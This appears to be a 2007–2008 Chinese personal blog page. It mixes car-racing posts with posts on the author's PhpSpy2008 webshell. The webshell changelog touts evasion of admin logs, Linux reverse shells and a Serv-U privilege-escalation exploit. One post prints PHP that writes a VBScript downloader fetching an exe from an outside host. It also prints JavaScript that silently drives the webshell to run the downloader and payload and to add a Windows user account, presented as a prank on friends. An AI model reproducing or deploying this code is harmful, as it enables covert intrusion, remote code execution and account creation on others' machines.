浏览模式: 标准 | 列表 全部文章

广西都市车王挑战赛——总决赛

Written by angel on 2008, January 2, 5:41 PM

大多数相片都在这里，其中视频部分就不发布了。请广西的朋友关注每天中午1点，晚上10点的广西咨询频道车视界栏目。

http://photo.163.com/photos/4ngel/144867375/ (照片数量过多。没有做任何处理。如涉及隐私，请联系QQ:115865)

先说说这个历时半年的广西都市车王挑战赛的我的成绩：

个人A组预决赛第9，总决赛第14，家庭组第2。

总的来说这个成绩我比较满意了，由于我的车轴距问题，被分在了A组。A组都是小型车很多。所以在比赛过程中，非常有优势，B组是长轴距的车，我的车如果放在B组，那就是前5名了。家庭组呢，因为是开车和遥控车的成绩结合，所以关键靠女的。在我们大家的努力下。我们车队——酷马必胜车队，荣获A组亚军、季军，B组季军，家庭组冠亚军，团体组冠亚军的优异成绩。

更加精彩的过程，等我吃完饭再来写。。。大家先看照片。。

图片附件(缩略图):

Tags: 比赛, 南宁, 车王, 都市, 挑战

Filed under: 生活琐碎 10 Comments 5369 Views

广西第一改装EVO

Written by angel on 2007, December 25, 6:52 PM

我好兄弟小海的车。500匹马力，比宝马M6还快，4秒0-100，到了180还有推倍感。和国内最快的evo也差不了多少。和我们几辆车在荔浦到桂林的路上。大家都开到170了。这辆EVO硬是从旁边呼啸而过。超哪辆车车那辆就要刹车。

下面来看看一段短短的视频，看到刹车灯的时候。速度已经达到150了。

» 阅读全文

Tags: evo, 改装

Filed under: 汽车改装 27 Comments 8125 Views

PhpSpy2008更新记录

Written by angel on 2007, December 25, 4:30 AM

按回忆记述吧，phpspy从2006到2008，其中还有一个未公开的2007，不过2007已经不存在了。我就是从2007改过来的，已经没有2007的文件了。

加强cookie功能，以确保能百分百登陆。
改成全英文版并根据数据库的编码设置声明相应的页面编码，以确保各编码服务器能正常输出。
加强文件管理功能，增加批量删除文件。增加新的文件属性显示方式和宿主。增加目录改名。增加查看网站根目录和当前目录下的所有可写子目录。在WIN主机下自动探测所有分区以及分区类型。
增加通过MYSQL方式上传下载文件，其中下载文件不需要数据库用户具有FILE权限。即可完整下载。程序自动判断两种方式下载。上传需要具有FILE权限。
加强MYSQL数据库管理功能，增加查询回显并带分页显示，增加插入、修改、删除记录。增加查看表结构和常用信息、删除表功能。并支持多句同时运行。
增加执行PHP代码功能，并附加一些有用的PHP代码。例如Serv-U本地提权利用代码，适用于6.4以及一下版本。
增强执行命令功能。
简化一些PHP环境变量显示。
大大提高各个操作的效率，尤其是文件管理。加快多文件目录的输出速度。
基本全部改为POST方式提交数据和跳转。大大的增加了隐蔽性。防止管理员查看日志找出端倪。
增加linux主机端口反弹功能。使用PERL和C 双重实现。
……

更多更新请关注本博客和www.4ngel.net

AJAX在安全方面的应用

Written by angel on 2007, December 23, 5:08 PM

本来想给小黑群里的人开个玩笑。谁知道经过小黑的csrf实例后，大家都先看代码了。这下我明白了。小黑用过的招数都不能再用了。再用就不灵了。因为小黑太黑，让人印象深刻。

还是记录一下吧，ajax真的是隐秘性很高。我是这样来利用的。比较彻底。

PHP代码

elseif ($doing == 'writevbs') {
$fp = @fopen('c:/angel.vbs','w');
$vbs = "Set love = CreateObject(\"Microsoft.XMLHTTP\")\n".
"love.Open \"GET\",\"http://www.4ngel.net/1.exe\",0\n".
"love.Send()\n".
"Set you = CreateObject(\"ADODB.Stream\")\n".
"you.Mode = 3\n".
"you.Type = 1\n".
"you.Open()\n".
"you.Write(love.responseBody)\n".
"you.SaveToFile \"c:\\1.exe\",2";
@fwrite($fp,$vbs);
@fclose($fp);
}

加了一段代码是生成一个VBS脚本。这段脚本的作用从4ngel.net上下载一个1.exe文件保存到他本地的1.exe，然后有一段是AJAX的功能代码。

JavaScript代码

<script type="text/javascript">
var http_request = false;
function makeRequest(url, httpType, sendData) {
http_request = false;
if (!httpType) httpType = "GET";
if (window.XMLHttpRequest) { // Non-IE...
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType('text/plain');
}
} else if (window.ActiveXObject) { // IE
try {
http_request = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
http_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {}
}
}
if (!http_request) {
alert('Cannot send an XMLHTTP request');
return false;
}
http_request.open(httpType, url, true);
http_request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
http_request.send(sendData);
}
//makeRequest('<?=$self?>', 'POST', 'action=file&doing=writevbs');
//makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=c:\angel.vbs');
//makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=c:\1.exe');
makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=net user angel angel /add');
makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=echo my_name_is_angel > c:\\angel.txt');
</script>

最后几句是以POST方式请求本地测试环境中的phpspy2008，调用命令执行功能，生成vbs，然后执行VBS。再执行下载的exe文件。不过我已经注释掉了。这样在本地测试是成功的。对待自己兄弟们不能这么心狠。所以就注释掉了。加了一个用户。

我只是想说。AJAX作为一个现在逐渐受到重视的技术，在强调增加用户体验的同时，带来的安全也是神不知鬼不觉的。因为他的请求。你根本察觉不到。更具体的应用还是要靠大家自己去领悟了。

PhpSpy2008最终形态

Written by angel on 2007, December 21, 10:42 AM

本来想把sevr-u和mysql的溢出集成进去的。但是考虑到体积太大不利于隐藏，所以把这些功能做成插件形式。全部把模块写好。放在http://www.4ngel.net上，需要的时候再通过执行PHP代码功能执行就可以了。phpspy2008就只有文件管理、MYSQL管理和执行命令等功能。这样可以保证体积，目前都有60K了。对于一个WEBSHELL来说。还是有点太大。如果把serv-u和mysql的溢出整合进去。都要近100K了。

phpspy2008